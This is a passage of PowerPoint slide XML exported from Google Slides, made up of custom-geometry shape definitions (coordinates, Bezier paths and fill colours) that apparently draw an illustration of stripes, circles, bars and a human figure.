                <a:path w="11942" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7370" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4572" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11942"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1" name="Google Shape;58;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1368409"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2" name="Google Shape;59;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1668856"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3" name="Google Shape;60;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1968814" y="1271750"/>
              <a:ext cx="486080" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11943" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7371" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4573" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11943"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4" name="Google Shape;61;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2269261" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7359" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4573"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5" name="Google Shape;62;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2569708" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7359" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4561"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6" name="Google Shape;63;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2866777" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7346" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4560" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11918"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7" name="Google Shape;64;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1055875" y="4208223"/>
              <a:ext cx="502564" cy="182865"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12348" h="4493" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="9838" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9200" y="0"/>
                    <a:pt x="8568" y="272"/>
                    <a:pt x="8132" y="800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7799" y="1192"/>
                    <a:pt x="7620" y="1669"/>
                    <a:pt x="7608" y="2145"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2941" y="2181"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2906" y="1847"/>
                    <a:pt x="2739" y="1514"/>
                    <a:pt x="2465" y="1264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2206" y="1047"/>
                    <a:pt x="1887" y="940"/>
                    <a:pt x="1570" y="940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1173" y="940"/>
                    <a:pt x="778" y="1107"/>
                    <a:pt x="500" y="1431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2002"/>
                    <a:pt x="84" y="2883"/>
                    <a:pt x="655" y="3395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="915" y="3612"/>
                    <a:pt x="1233" y="3719"/>
                    <a:pt x="1550" y="3719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="3719"/>
                    <a:pt x="2342" y="3552"/>
                    <a:pt x="2620" y="3228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2822" y="3002"/>
                    <a:pt x="2917" y="2728"/>
                    <a:pt x="2953" y="2443"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7620" y="2395"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7668" y="2978"/>
                    <a:pt x="7918" y="3562"/>
                    <a:pt x="8418" y="3955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8832" y="4316"/>
                    <a:pt x="9346" y="4492"/>
                    <a:pt x="9859" y="4492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10496" y="4492"/>
                    <a:pt x="11131" y="4220"/>
                    <a:pt x="11573" y="3693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12347" y="2752"/>
                    <a:pt x="12228" y="1335"/>
                    <a:pt x="11288" y="538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10868" y="176"/>
                    <a:pt x="10351" y="0"/>
                    <a:pt x="9838" y="0"/>
                  </a:cubicBez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8" name="Google Shape;65;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1063608" y="2410971"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1168" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="1"/>
                    <a:pt x="1" y="525"/>
                    <a:pt x="1" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1799"/>
                    <a:pt x="525" y="2322"/>
                    <a:pt x="1168" y="2322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="2322"/>
                    <a:pt x="2323" y="1799"/>
                    <a:pt x="2323" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2323" y="525"/>
                    <a:pt x="1811" y="1"/>
                    <a:pt x="1168"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9" name="Google Shape;66;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1063608" y="2277721"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1168" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="0"/>
                    <a:pt x="1" y="524"/>
                    <a:pt x="1" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1798"/>
                    <a:pt x="525" y="2322"/>
                    <a:pt x="1168" y="2322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="2322"/>
                    <a:pt x="2323" y="1798"/>
                    <a:pt x="2323" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2323" y="524"/>
                    <a:pt x="1811" y="0"/>
                    <a:pt x="1168"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0" name="Google Shape;67;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="1822700"/>
              <a:ext cx="914936" cy="110053"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22480" h="2704" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="2703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480"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1" name="Google Shape;68;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="1981143"/>
              <a:ext cx="745828" cy="54335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324"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2" name="Google Shape;69;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="2069828"/>
              <a:ext cx="745828" cy="54823"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1347" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324"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3" name="Google Shape;70;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="2158512"/>
              <a:ext cx="489947" cy="54335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12038" h="1335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12038" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12038"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4" name="Google Shape;71;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1130966" y="5001539"/>
              <a:ext cx="220065" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5407" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3335" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073"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5" name="Google Shape;72;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267636" y="5001539"/>
              <a:ext cx="219536" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5394" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3334" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5394"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6" name="Google Shape;73;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403330" y="5001539"/>
              <a:ext cx="220513" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5418" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3346" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5418"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7" name="Google Shape;74;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1539471" y="5001539"/>
              <a:ext cx="220065" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5407" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3335" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073"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8" name="Google Shape;75;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1675653" y="5001539"/>
              <a:ext cx="220024" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5406" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3334" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2072"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9" name="Google Shape;76;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1811835" y="5001539"/>
              <a:ext cx="220024" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5406" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3334" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2072"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0" name="Google Shape;77;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1598120" y="4774272"/>
              <a:ext cx="1247862" cy="2488764"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="30660" h="61149" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="727" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11014"/>
                    <a:pt x="3072" y="44744"/>
                    <a:pt x="4144" y="56293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4168" y="56603"/>
                    <a:pt x="4453" y="56960"/>
                    <a:pt x="4477" y="57245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4644" y="59019"/>
                    <a:pt x="4751" y="60091"/>
                    <a:pt x="4751" y="60258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4779" y="60847"/>
                    <a:pt x="6567" y="61148"/>
                    <a:pt x="8454" y="61148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10570" y="61148"/>
                    <a:pt x="12810" y="60770"/>
                    <a:pt x="12835" y="59996"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12871" y="57055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13276" y="56186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15633" y="14514"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15615" y="14003"/>
                    <a:pt x="15763" y="13674"/>
                    <a:pt x="15908" y="13674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16040" y="13674"/>
                    <a:pt x="16169" y="13945"/>
                    <a:pt x="16169" y="14597"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16122" y="24872"/>
                    <a:pt x="18622" y="46697"/>
                    <a:pt x="19003" y="55733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19027" y="55948"/>
                    <a:pt x="19348" y="56162"/>
                    <a:pt x="19348" y="56364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19455" y="58567"/>
                    <a:pt x="19527" y="59936"/>
                    <a:pt x="19539" y="60079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19635" y="60525"/>
                    <a:pt x="21296" y="60734"/>
                    <a:pt x="23092" y="60734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25274" y="60734"/>
                    <a:pt x="27656" y="60426"/>
                    <a:pt x="27683" y="59865"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27683" y="59734"/>
                    <a:pt x="27790" y="58424"/>
                    <a:pt x="27921" y="56257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27933" y="56007"/>
                    <a:pt x="28171" y="55733"/>
                    <a:pt x="28194" y="55448"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28921" y="44041"/>
                    <a:pt x="30659" y="13573"/>
                    <a:pt x="29385" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29385" y="48"/>
                    <a:pt x="15360" y="0"/>
                    <a:pt x="727"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1" name="Google Shape;78;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1615091" y="4944844"/>
              <a:ext cx="1192103" cy="155596"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="29290" h="3823" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16252" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1310"/>
                    <a:pt x="5668" y="3822"/>
                    <a:pt x="15443" y="3822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25230" y="3822"/>
                    <a:pt x="29290" y="1310"/>
                    <a:pt x="29290" y="1310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16252" y="0"/>
                  </a:ln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2" name="Google Shape;79;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1944598" y="1693805"/>
              <a:ext cx="632885" cy="1078224"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="15550" h="26492" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7870" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7870" y="0"/>
                    <a:pt x="131" y="3787"/>
                    <a:pt x="131" y="7335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="10907"/>
                    <a:pt x="0" y="21860"/>
                    <a:pt x="1977" y="26492"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13657" y="26492"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15348" y="23587"/>
                    <a:pt x="15550" y="10918"/>
                    <a:pt x="15550" y="7370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15550" y="3822"/>
                    <a:pt x="7870" y="0"/>
                    <a:pt x="7870" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="03172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3" name="Google Shape;80;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2657416" y="3209578"/>
              <a:ext cx="399348" cy="940170"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9812" h="23100" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7287" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="310" y="5215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4287" y="15097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="20014"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20014"/>
                    <a:pt x="897" y="23099"/>
                    <a:pt x="1032" y="23099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="23099"/>
                    <a:pt x="1035" y="23099"/>
                    <a:pt x="1036" y="23098"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1155" y="23039"/>
                    <a:pt x="8978" y="18074"/>
                    <a:pt x="9395" y="16038"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9811" y="14002"/>
                    <a:pt x="7287" y="0"/>
                    <a:pt x="7287" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0E263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4" name="Google Shape;81;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1425104" y="3226997"/>
              <a:ext cx="400814" cy="942124"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9848" h="23148" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2835" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2835" y="1"/>
                    <a:pt x="1" y="13538"/>
                    <a:pt x="418" y="15562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="834" y="17610"/>
                    <a:pt x="8704" y="23087"/>
                    <a:pt x="8823" y="23146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8825" y="23147"/>
                    <a:pt x="8826" y="23148"/>
                    <a:pt x="8828" y="23148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8963" y="23148"/>
                    <a:pt x="9847" y="20063"/>
                    <a:pt x="9847" y="20063"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5561" y="15145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9538" y="5263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835" y="1"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0E263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5" name="Google Shape;82;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1367473" y="2660053"/>
              <a:ext cx="1682009" cy="2371589"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="41327" h="58270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="17026" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17026" y="0"/>
                    <a:pt x="9489" y="2917"/>
                    <a:pt x="6930" y="4656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3524" y="6966"/>
                    <a:pt x="107" y="15717"/>
                    <a:pt x="0" y="18515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="18515"/>
                    <a:pt x="4929" y="19693"/>
                    <a:pt x="9156" y="20836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9275" y="22872"/>
                    <a:pt x="9192" y="25194"/>
                    <a:pt x="8799" y="27873"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8585" y="29230"/>
                    <a:pt x="6179" y="44482"/>
                    <a:pt x="5298" y="52090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5239" y="52566"/>
                    <a:pt x="6358" y="53614"/>
                    <a:pt x="6299" y="54067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6120" y="55543"/>
                    <a:pt x="5906" y="57150"/>
                    <a:pt x="6096" y="57436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6346" y="57817"/>
                    <a:pt x="13299" y="58270"/>
                    <a:pt x="21443" y="58270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28730" y="58270"/>
                    <a:pt x="35147" y="57615"/>
                    <a:pt x="35421" y="57353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35671" y="57162"/>
                    <a:pt x="35445" y="56210"/>
                    <a:pt x="35338" y="54531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35326" y="54186"/>
                    <a:pt x="36445" y="53305"/>
                    <a:pt x="36409" y="52924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36017" y="46613"/>
                    <a:pt x="33873" y="32183"/>
                    <a:pt x="33814" y="31326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33552" y="27218"/>
                    <a:pt x="33683" y="23813"/>
                    <a:pt x="33992" y="20967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38576" y="20265"/>
                    <a:pt x="41327" y="15955"/>
                    <a:pt x="41327" y="15955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41208" y="12633"/>
                    <a:pt x="39803" y="7489"/>
                    <a:pt x="37005" y="5715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35135" y="4037"/>
                    <a:pt x="28349" y="1263"/>
                    <a:pt x="26480" y="715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25721" y="492"/>
                    <a:pt x="25006" y="422"/>
                    <a:pt x="24298" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23141" y="422"/>
                    <a:pt x="22001" y="607"/>
                    <a:pt x="20706" y="607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19621" y="607"/>
                    <a:pt x="18427" y="477"/>
                    <a:pt x="17026"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6" name="Google Shape;83;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2053022" y="2400797"/>
